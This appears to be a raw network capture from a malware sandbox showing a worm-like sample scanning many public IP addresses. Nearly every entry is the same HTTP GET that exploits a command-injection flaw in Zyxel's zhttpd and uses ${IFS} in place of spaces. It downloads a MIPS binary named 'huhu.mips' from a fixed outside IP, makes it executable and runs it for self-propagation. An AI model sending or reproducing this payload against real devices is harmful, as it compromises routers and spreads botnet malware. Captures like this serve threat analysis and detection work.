                                              Jan 29, 2024 07:03:37.772074938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1410192.168.2.1440530163.118.145.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772098064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1411192.168.2.1446402204.247.103.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772151947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1412192.168.2.145877487.125.192.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772201061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1413192.168.2.143576068.207.57.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772233963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1414192.168.2.1436856124.252.133.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772267103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1415192.168.2.1450860175.153.149.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772286892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1416192.168.2.1458730220.1.229.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772314072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1417192.168.2.14560242.130.18.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772340059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1418192.168.2.143720880.180.51.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772370100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1419192.168.2.1454800155.118.67.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772398949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1420192.168.2.1444016146.121.127.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772433043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1421192.168.2.143846473.35.166.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772448063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1422192.168.2.1446064179.34.139.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772491932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1423192.168.2.144684288.202.157.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772535086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1424192.168.2.1443434104.162.105.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772563934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1425192.168.2.1446816186.27.145.196443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772595882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1426192.168.2.1459674205.38.65.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772615910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1427192.168.2.1439758159.24.68.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772660971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1428192.168.2.1453082144.8.51.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772691011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1429192.168.2.1453388133.132.183.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772718906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1430192.168.2.1436498195.110.67.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772770882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1431192.168.2.1451668132.230.226.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772819996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1432192.168.2.1456144220.134.159.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772857904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1433192.168.2.14370665.68.89.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772892952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1434192.168.2.145586477.89.101.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772933960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1435192.168.2.145947275.195.220.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.772986889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1436192.168.2.1433006116.44.209.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773016930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1437192.168.2.143414041.9.27.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773076057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1438192.168.2.144794886.16.247.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773098946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1439192.168.2.1452194124.135.94.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773153067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1440192.168.2.1436930129.245.117.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773185968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1441192.168.2.144071273.170.112.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773211002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1442192.168.2.1455678165.171.23.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773294926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1443192.168.2.1453116217.82.205.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773324013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1444192.168.2.1443806196.60.65.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773354053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1445192.168.2.146049851.233.131.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773384094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1446192.168.2.1452676181.26.26.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773422956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1447192.168.2.145844838.115.27.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773462057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1448192.168.2.144844419.222.177.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773516893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1449192.168.2.1435702197.32.231.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773564100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1450192.168.2.1444932146.64.5.161443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773597956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1451192.168.2.1455010209.146.228.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773648977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1452192.168.2.143920813.48.28.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773683071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1453192.168.2.143356044.27.247.141443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773704052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1454192.168.2.145321490.37.178.55443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773768902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1455192.168.2.1436620100.42.167.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773802996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1456192.168.2.1455380126.189.227.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773838997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1457192.168.2.1458612218.246.153.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773869038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1458192.168.2.143951485.128.198.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773893118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1459192.168.2.145253858.69.189.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773922920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1460192.168.2.1456208176.133.43.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.773988008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1461192.168.2.145727623.233.215.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774036884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1462192.168.2.1437054182.75.158.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774071932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1463192.168.2.1442488149.231.74.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774091959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1464192.168.2.1459604196.94.161.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774123907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1465192.168.2.1453156217.80.135.149443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774152994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1466192.168.2.14399344.231.227.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774202108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1467192.168.2.1450820102.168.239.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774260044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1468192.168.2.1443920118.35.194.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774298906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1469192.168.2.143489287.141.67.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774358988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1470192.168.2.1457596150.143.22.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774388075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1471192.168.2.1432926206.90.128.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774430037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1472192.168.2.144948068.197.32.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:37.774472952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1473192.168.2.145757670.42.237.165443
                                              TimestampBytes transferredDirectionData
